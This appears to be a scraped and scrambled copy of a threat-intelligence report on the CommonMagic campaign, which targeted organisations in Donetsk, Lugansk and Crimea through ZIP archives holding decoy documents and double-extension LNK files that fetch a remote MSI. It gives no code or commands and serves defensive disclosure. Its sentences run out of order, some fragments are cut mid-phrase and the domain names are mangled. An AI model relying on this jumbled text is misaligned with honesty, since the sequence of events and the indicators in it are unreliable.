The malicious LNK points to a remotely hosted malicious MSI file that is downloaded and started by the Windows Installer executable. The malware and techniques used in this campaign are not particularly sophisticated, but are effective, and the code has no direct relation to any known campaigns.
When the potential victim activates the LNK file included in the ZIP file, it triggers a chain of events that lead to the infection of the computer with a previously unseen malicious framework that we named CommonMagic. The ZIP files were downloaded from various locations hosted on two domains: webservice-srvonline and webservice-srv1online 176), and the decoy document explicitly referenced it by name in the text.ĭecoy PDF with reference to a malicious shortcut file (subject: information about DPR Ministry of Finance Decree No. For example, one archive contained an LNK file named “Приказ Минфина ДНР № ” ( Ministry of Finance Decree No.
In several cases, the contents of the decoy document were directly related to the name of the malicious LNK to trick the user into activating it. pdf.lnk) that leads to infection when openedĭecoy Word document (subject: Results of the State Duma elections in the Republic of Crimea) A malicious LNK file with a double extension (e.g.A decoy document (we discovered PDF, XLSX and DOCX versions).The archive, in turn, contained two files: The victims navigated to a URL pointing to a ZIP archive hosted on a malicious web server. Although the initial vector of compromise is unclear, the details of the next stage imply the use of spear phishing or similar methods. In October 2022, we identified an active infection of government, agriculture and transportation organizations located in the Donetsk, Lugansk, and Crimea regions. We previously published an overview of cyber activities and the threat landscape related to the conflict between Russia and Ukraine and continue to monitor new threats in these regions. Since the start of the Russo-Ukrainian conflict, Kaspersky researchers and the international community at large have identified a significant number of cyberattacks executed in a political and geopolitical context.
0 kommentar(er)
